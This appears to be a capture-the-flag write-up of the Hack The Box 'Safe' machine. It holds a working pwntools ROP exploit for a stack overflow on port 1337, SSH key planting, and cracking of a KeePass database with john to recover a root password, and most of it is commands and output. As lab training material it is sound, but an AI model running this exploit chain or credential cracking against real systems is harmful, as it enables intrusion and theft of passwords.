Preface

This is a writeup for the Safe machine from Hack The Box.

Information gathering

I started with a scan of all ports, but it never finished (not sure whether it was a network problem), so I later put a limit on the rate:

kali at ~/htb/safe ❯ nmap -p- --min-rate 10000 -sV -sC -sS 10.10.10.147
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-14 22:27 EST
Nmap scan report for 10.10.10.147
Host is up (7.6s latency).
Not shown: 61065 filtered ports, 4468 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 6d:7c:81:3d:6a:3d:f9:5f:2e:1f:6a:97:e5:00:ba:de (RSA)
| 256 99:7e:1e:22:76:72:da:3c:c9:61:7d:74:d7:80:33:d2 (ECDSA)
|_ 256 6a:6b:c3:8e:4b:28:f7:60:85:b1:62:ff:54:bc:d8:d6 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only ports 22 and 80 are open, so the way in has to be the web: Apache running on Debian.

Why port 1337 did not show up in the scan

Later on it turned out that port 1337 was open as well, and some of the other writeups I read did find it with nmap. Why did my scan miss it? Because the -Pn option should be used:

kali at ~/htb/safe ❯ nmap -Pn -p1337 10.10.10.147
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-14 23:01 EST
Nmap scan report for 10.10.10.147
Host is up (0.45s latency).

PORT STATE SERVICE
1337/tcp open waste

Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds
kali at ~/htb/safe ❯ nmap -p1337 10.10.10.147
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-14 23:01 EST
Nmap scan report for 10.10.10.147
Host is up (0.00029s latency).

PORT STATE SERVICE
1337/tcp filtered waste

Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds

By default nmap first checks whether the host is alive, and -Pn skips that host discovery step (i.e. no ping). What puzzles me is that this IP is pingable, so in theory it should make no difference whether host discovery is skipped or not. Why do the results differ with and without -Pn?

Web

Opening it shows nothing but the default Debian Apache page:

Seeing this page, the obvious next step is a directory scan:

⇒  python dirsearch.py -u http://10.10.10.147 -e *

_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: CHANGELOG.md | HTTP method: get | Threads: 10 | Wordlist size: 6103

Error Log: /Users/danta/Code/dirsearch/logs/errors-19-12-14_19-09-19.log

Target: http://10.10.10.147

[19:09:20] Starting:
[19:09:33] 403 - 291B - /.hta
[19:09:33] 403 - 300B - /.htaccess.BAK
[19:09:33] 403 - 301B - /.htaccess.bak1
[19:09:33] 403 - 302B - /.htaccess-marco
[19:09:33] 403 - 300B - /.htaccess-dev
[19:09:33] 403 - 302B - /.htaccess-local
[19:09:33] 403 - 298B - /.ht_wsr.txt
[19:09:33] 403 - 300B - /.htaccess.old
[19:09:33] 403 - 301B - /.htaccess.orig
[19:09:33] 403 - 301B - /.htaccess.save
[19:09:33] 403 - 303B - /.htaccess.sample
[19:09:33] 403 - 300B - /.htaccess.txt
[19:09:33] 403 - 299B - /.htaccess_sc
[19:09:33] 403 - 299B - /.htaccessBAK
[19:09:33] 403 - 302B - /.htaccess_extra
[19:09:33] 403 - 301B - /.htaccess_orig
[19:09:34] 403 - 300B - /.htaccessOLD2
[19:09:34] 403 - 295B - /.htgroup
[19:09:34] 403 - 297B - /.htaccess~
[19:09:34] 403 - 299B - /.htaccessOLD
[19:09:34] 403 - 300B - /.htpasswd-old
[19:09:34] 403 - 301B - /.htpasswd_test
[19:09:35] 403 - 297B - /.htpasswds
[19:09:35] 403 - 295B - /.htusers
[19:12:31] 200 - 11KB - /index.html
[19:12:56] 301 - 313B - /manual -> http://10.10.10.147/manual/
[19:12:56] 200 - 626B - /manual/index.html
[19:13:53] 403 - 300B - /server-status
[19:13:53] 403 - 301B - /server-status/

Task Completed

Opening /manual gives the Apache documentation, another default page. I then tried a few other wordlists and got the same result. I could not think of any other entry point, and only after reading other people's writeups did I learn that this was possible...

Look at the source of the index page:

It says there is also a port 1337, and that the program can be downloaded from the path myapp. I really did not expect the default page to have been modified; clearly no detail can be overlooked..

After downloading myapp, file shows it is an executable. Run it, then have a look at port 1337:

kali at ~/htb/safe ❯ file myapp
myapp: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=fcbd5450d23673e92c8b716200762ca7d282c73a, not stripped
kali at ~/htb/safe ❯ chmod u+x myapp
kali at ~/htb/safe ❯ ./myapp
00:23:04 up 1 day, 23:52, 3 users, load average: 0.00, 0.00, 0.00

What do you want me to echo back? ls
ls
kali at ~/htb/safe ❯ nc 10.10.10.147 1337
00:26:35 up 18:21, 0 users, load average: 0.00, 0.00, 0.00
ls

What do you want me to echo back? ls

At this point I was a bit surprised... isn't this just a pwn challenge....

Getting a shell through the stack overflow

So now we know the program listening on port 1337 is myapp, and all we know about it so far is that it echoes back whatever we type. This looks like a stack overflow challenge.

checksec shows that NX is enabled and no other protections are. There are roughly four ways to exploit a stack overflow (see 手把手教你栈溢出从入门到放弃(上) and 手把手教你栈溢出从入门到放弃(下)). NX means shellcode cannot be executed on the stack, and since the version of the dynamic library is unknown, return-to-libc is not an option either. That leaves ROP.

root@kali:htb/safe # gdb -q myapp
Reading symbols from myapp...
(No debugging symbols found in myapp)
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial

To get a shell with ROP we need to determine two things: the length of the overflow (how many bytes it takes to reach the return address) and the addresses of the gadgets (short instruction sequences) to chain.

Determining the overflow length

With the Peda plugin installed in gdb, the overflow length is easy to determine. One thing to note: when debugging a multi-process program, gdb by default only debugs the parent process, whereas peda keeps following the child (related). In this program the forking made the debuggee exit straight away, so I first ran set follow-fork-mode parent to make sure peda only debugs the parent process.

root@kali:htb/safe # gdb -q myapp
Reading symbols from myapp...
(No debugging symbols found in myapp)
gdb-peda$ set follow-fork-mode parent
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ r
Starting program: /root/htb/safe/myapp
[Detaching after vfork from child process 79586]
03:15:51 up 2 days, 2:44, 3 users, load average: 0.00, 0.00, 0.00

What do you want me to echo back? AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7ee0904 (<__GI___libc_write+20>: cmp rax,0xfffffffffffff000)
RDX: 0x7ffff7fb1580 --> 0x0
RSI: 0x405260 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
RDI: 0x0
RBP: 0x41414e4141384141 ('AA8AANAA')
RSP: 0x7fffffffe348 ("jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
RIP: 0x4011ac (<main+77>: ret)
R8 : 0xc9
R9 : 0x0
R10: 0x4003e0 --> 0x6972700073747570 ('puts')
R11: 0x246
R12: 0x401070 (<_start>: xor ebp,ebp)
R13: 0x7fffffffe420 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x4011a1 <main+66>: call 0x401030 <puts@plt>
0x4011a6 <main+71>: mov eax,0x0
0x4011ab <main+76>: leave
=> 0x4011ac <main+77>: ret
0x4011ad: nop DWORD PTR [rax]
0x4011b0 <__libc_csu_init>: push r15
0x4011b2 <__libc_csu_init+2>: mov r15,rdx
0x4011b5 <__libc_csu_init+5>: push r14
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe348 ("jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0008| 0x7fffffffe350 ("AkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0016| 0x7fffffffe358 ("AAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0024| 0x7fffffffe360 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0032| 0x7fffffffe368 ("ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0040| 0x7fffffffe370 ("AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0048| 0x7fffffffe378 ("VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0056| 0x7fffffffe380 ("AuAAXAAvAAYAAwAAZAAxAAyA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004011ac in main ()

After the 200-character string is entered the program crashes: its return address has been overwritten by the input, and returning to that bogus address causes the segfault. The bogus address is exactly the value at the top of the stack, so we take the value at RSP and use it to compute the overflow length.

gdb-peda$ pattern_offset jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA found at offset: 120
gdb-peda$ pattern_create

So the overflow length is 120.
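The offset lookup peda does here can be reproduced by hand. The following is an added example, not code from the original writeup or from peda itself: it regenerates peda's default pattern (a de Bruijn sequence of order 3 over peda's interleaved charset, which is what yields the AAA%AAs... string above) and then finds the offset of either the string seen at RSP or a raw register value such as the RBP qword from the crash, decoded as little-endian.

```python
from typing import Union

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"

def peda_charset() -> str:
    # peda's extended charset: three columns interleaved one char at a time,
    # with "%$-;" prepended to the lowercase set and "sn()" to the digit set
    columns = [UPPER, "%$-;" + LOWER.replace("s", "").replace("n", ""), "sn()" + DIGITS]
    mixed, k = "", 0
    while True:
        chunk = "".join(col[k:k + 1] for col in columns)
        if not chunk:
            return mixed          # 68 symbols in total
        mixed += chunk
        k += 1

def de_bruijn(alphabet: str, n: int, maxlen: int) -> str:
    # Fredricksen-Kessler-Maiorana construction of B(k, n): every n-gram occurs
    # once, so any n consecutive bytes found in a register map to a unique offset
    k, a, out = len(alphabet), [0] * (len(alphabet) * n), []
    def db(t: int, p: int) -> None:
        if len(out) >= maxlen:
            return
        if t > n:
            if n % p == 0:
                out.extend(alphabet[a[j]] for j in range(1, p + 1))
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)
    db(1, 1)
    return "".join(out[:maxlen])

def pattern_create(length: int) -> str:
    # same output as peda's "pattern_create <length>" (peda uses n = 3)
    return de_bruijn(peda_charset(), 3, length)

def pattern_offset(value: Union[str, int], search_len: int = 20000) -> int:
    # accepts the string seen at RSP, or a raw register value such as
    # RBP = 0x41414e4141384141, which is decoded as a little-endian qword
    if isinstance(value, int):
        value = value.to_bytes(8, "little").decode("ascii")
    return pattern_create(search_len).find(value)

if __name__ == "__main__":
    print(pattern_create(200))
    print(pattern_offset("jAA9AAOAAkAAPAAl"))      # 120, the return address
    print(pattern_offset(0x41414e4141384141))     # 112, the saved RBP just below it
```

The saved RBP lands at 112 and the return address at 120, which is the 8-byte gap one expects on x86-64 and a quick consistency check on the offset before building a chain.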

Choosing gadgets

The end goal is a shell, so we need to execute something like system("/bin/sh"). Since the stack overflow gives us control of the execution flow, two more things are required: the address of system and the address of a "/bin/sh" string.

First, see which functions the program itself already provides:

gdb-peda$ info functions
All defined functions:

Non-debugging symbols:
0x0000000000401000 _init
0x0000000000401030 puts@plt
0x0000000000401040 system@plt
0x0000000000401050 printf@plt
0x0000000000401060 gets@plt
0x0000000000401070 _start
0x00000000004010a0 _dl_relocate_static_pie
0x00000000004010b0 deregister_tm_clones
0x00000000004010e0 register_tm_clones
0x0000000000401120 __do_global_dtors_aux
0x0000000000401150 frame_dummy
0x0000000000401152 test
0x000000000040115f main
0x00000000004011b0 __libc_csu_init
0x0000000000401210 __libc_csu_fini
0x0000000000401214 _fini

Both system and gets are there, so we can use gets to read "/bin/sh" into memory and then pass it to system.

Decompiling the program in IDA shows that its .data section is writable, at address 0x404038. So we can call gets to write "/bin/sh" to 0x404038 and then call system(0x404038). We also need a gadget that loads the argument into rdi before jumping to gets.

ROPgadget finds that gadget easily:

root@kali:htb/safe # ROPgadget --binary myapp --only "pop|ret" | grep rdi
0x000000000040120b : pop rdi ; ret

The exploit written along those lines:

from pwn import *

context(os="linux", arch="amd64")
#context(log_level='DEBUG')

# 120 bytes of filler reach the saved return address (offset from pattern_offset)
junk = b"A" * 120

plt_gets = p64(0x401060)    # gets@plt
plt_system = p64(0x401040)  # system@plt
pop_rdi = p64(0x40120b)     # pop rdi ; ret
binsh = p64(0x404038)       # writable .data address that will hold "/bin/sh"

# gets(binsh) reads the string into .data, then system(binsh) executes it
payload = junk + pop_rdi + binsh + plt_gets + pop_rdi + binsh + plt_system

p = remote("10.10.10.147", 1337)
p.recvline()                 # the uptime line printed on connect
p.sendline(payload)          # overflows the buffer read by the program's own gets()
p.sendline(b'/bin/sh\x00')   # consumed by the gets() call in the ROP chain
p.interactive()

The gadgets here are not the only choice; when plenty of usable gadgets are available there is more than one way to get a shell, and an author abroad has written up several other methods: https://0xdf.gitlab.io/2019/10/26/htb-safe.html

root@kali:htb/safe # python exp1.py
[+] Opening connection to 10.10.10.147 on port 1337: Done
[*] Switching to interactive mode
$ whoami
user

Privilege escalation

While looking around the server just now I noticed a few images in the home directory alongside MyPasswords.kdbx (isn't that KeePass, the password manager I used because I could not remember passwords, and then lost all my passwords because I could not remember the password manager's password?)

$ ls
IMG_0545.JPG
IMG_0546.JPG
IMG_0547.JPG
IMG_0548.JPG
IMG_0552.JPG
IMG_0553.JPG
myapp
MyPasswords.kdbx
user.txt

Several images plus a kdbx database: the hint is fairly obvious, the kdbx is protected by a password plus an image used as key file. After getting a shell with the method above, and since port 22 is open on this box, I copied my public key over so I could connect over SSH, then downloaded the files to crack them locally.

root@kali:htb/safe # cat ~/.ssh/id_rsa.pub | base64 -w0
c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FEUmZBbjhSK0FtWWV4RkJUdW1zTDBUekJOTHJCOUs1NG1VT1JBa1l3T3JOcDNrYnhrejBvWHlGckR0cGdWc2pWdDQ4SkFRS0J2UXBCMmlBY3ZoYk5mZjRwVTJhdWZmMkZ4Z....(omitted)
$ echo c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FEUmZBbjhSK0FtWWV4RkJUdW1zTDBUekJOTHJCOUs1NG1VT1JBa1l3T3JOcDNrYnhrejBvWHlGckR0cGdWc2pWdDQ4SkFRS0J2UXBCMmlBY3ZoYk5mZjRwVTJhdWZmMkZ4Z....(omitted) | base64 -d >> /home/user/.ssh/authorized_keys
root@kali# scp -i ~/id_rsa_generated user@10.10.10.147:~/IMG* .
IMG_0545.JPG 100% 1863KB 944.7KB/s 00:01
IMG_0546.JPG 100% 1872KB 1.6MB/s 00:01
IMG_0547.JPG 100% 2470KB 2.0MB/s 00:01
IMG_0548.JPG 100% 2858KB 1.5MB/s 00:01
IMG_0552.JPG 100% 1099KB 1.6MB/s 00:00
IMG_0553.JPG 100% 1060KB 2.3MB/s 00:00
root@kali# scp -i ~/id_rsa_generated user@10.10.10.147:~/*.kdbx .
MyPasswords.kdbx 100% 2446

Use keepass2john to generate the hash file (once without a key file, then once per image used as key file):

root@kali# keepass2john MyPasswords.kdbx > MyPasswords.kdbx.john; for img in $(ls IMG*); do /opt/john/run/keepass2john -k $img MyPasswords.kdbx; done >> MyPasswords.kdbx.john

root@kali# cat MyPasswords.kdbx.john
MyPasswords:$keepass$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96
MyPasswords:$keepass$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96*1*64*17c3509ccfb3f9bf864fca0bfaa9ab137c7fca4729ceed90907899eb50dd88ae
MyPasswords:$keepass$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96*1*64*a22ce4289b755aaebc6d4f1b49f2430abb6163e942ecdd10a4575aefe984d162
MyPasswords:$keepass$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96*1*64*e949722c426b3604b5f2c9c2068c46540a5a2a1c557e66766bab5881f36d93c7
MyPasswords:$keepass$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96*1*64*d86a22408dcbba156ca37e6883030b1a2699f0da5879c82e422c12e78356390f
MyPasswords:$keepass$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96*1*64*facad4962e8f4cb2718c1ff290b5026b7a038ec6de739ee8a8a2dd929c376794
MyPasswords:$keepass$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96*1*64*7c83badcfe0cd581613699bb4254d3ad06a1a517e2e81c7a7ff4493a5f881cf2

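To see what john is actually being handed, the following added example (not from the original writeup or from john) parses keepass2john lines of the shape shown above into their fields. Field meanings follow what john reports for this file as Cost 1/2/3 (60000 transform rounds, version 2, algorithm 0 = AES); the trailing *1*64*<hex> block is the key-file hash that keepass2john -k appends, and it is absent on the first, password-only line. The sample lines are constructed with shortened hex values and are not the real hashes.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional

@dataclass
class KeePassHash:
    name: str
    version: int                  # john "Cost 2": 2 for KDBX
    rounds: int                   # john "Cost 1": key-transform rounds (60000 above)
    algorithm: int                # john "Cost 3": 0 = AES, 1 = TwoFish, 2 = ChaCha
    master_seed: str
    transform_seed: str
    iv: str
    expected_start: str
    contents_hash: str
    keyfile_hash: Optional[str]   # only present on lines produced with -k

def parse_keepass2john(line: str) -> KeePassHash:
    name, _, hashpart = line.strip().partition(":")
    if not hashpart.startswith("$keepass$*"):
        raise ValueError("not a keepass2john line: %r" % line)
    f = hashpart.split("*")[1:]            # drop the leading "$keepass$" tag
    if len(f) not in (8, 11) or f[0] != "2":
        raise ValueError("unsupported field layout: %r" % hashpart)
    keyfile = None
    if len(f) == 11:                        # suffix *1*<hex length>*<hex>
        if f[8] != "1" or int(f[9]) != len(f[10]):
            raise ValueError("malformed key-file suffix: %r" % f[8:])
        keyfile = f[10]
    return KeePassHash(name, int(f[0]), int(f[1]), int(f[2]),
                       f[3], f[4], f[5], f[6], f[7], keyfile)

def summarize(lines: List[str]) -> Dict[str, object]:
    # One summary per hash file: how many candidates carry a key file,
    # and the KDF cost every guess has to pay
    parsed = [parse_keepass2john(l) for l in lines if l.strip()]
    return {
        "total": len(parsed),
        "with_keyfile": sum(1 for h in parsed if h.keyfile_hash),
        "rounds": sorted({h.rounds for h in parsed}),
        "algorithms": sorted({h.algorithm for h in parsed}),
    }

# Constructed sample in the layout of the writeup's output (hex shortened, not real)
SAMPLE = [
    "MyPasswords:$keepass$*2*60000*0*a9d7b3ab*9a700a89*36079dc6*f4e75e39*78ad27a0",
    "MyPasswords:$keepass$*2*60000*0*a9d7b3ab*9a700a89*36079dc6*f4e75e39*78ad27a0*1*8*17c3509c",
    "MyPasswords:$keepass$*2*60000*0*a9d7b3ab*9a700a89*36079dc6*f4e75e39*78ad27a0*1*8*a22ce428",
]

if __name__ == "__main__":
    print(summarize(SAMPLE))
```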
After a few HTB boxes it feels like the cracking here can always be done with rockyou.txt (though rockyou.txt is quite large, so start with a smaller list). Crack with john:

root@kali# john MyPasswords.kdbx.john /usr/share/seclists/Passwords/Leaked-Databases/rockyou-30.txt 
Warning: only loading hashes of type "KeePass", but also saw type "tripcode"
Use the "--format=tripcode" option to force loading hashes of that type instead
Warning: only loading hashes of type "KeePass", but also saw type "descrypt"
Use the "--format=descrypt" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 7 password hashes with 7 different salts (KeePass [SHA256 AES 32/64 OpenSSL])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bullshit (MyPasswords)
1g 0:00:01:20 0.47% 2/3 (ETA: 15:46:09) 0.01239g/s 91.21p/s 154.1c/s 154.1C/s emerald..francesco
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

With the password in hand, open the password manager and look around:

root@kali# kpcli --key IMG_0547.JPG --kdb MyPasswords.kdbx
Please provide the master password: *************************

KeePass CLI (kpcli) v3.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> ls
=== Groups ===
MyPasswords/
kpcli:/> cd MyPasswords/
kpcli:/MyPasswords> ls
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Recycle Bin/
Windows/
=== Entries ===
0. Root password
kpcli:/MyPasswords> show -f R
Recycle\ Bin/ Root\ password
kpcli:/MyPasswords> show -f Root\ password

Path: /MyPasswords/
Title: Root password
Uname: root
Pass: u3v2249dl9ptv465cogl3cnpo3fyhk
URL:
Notes:

Use su - to escalate:

user@safe:~$ su -
Password:
root@safe:~# cat root.txt
d7af235eb1.....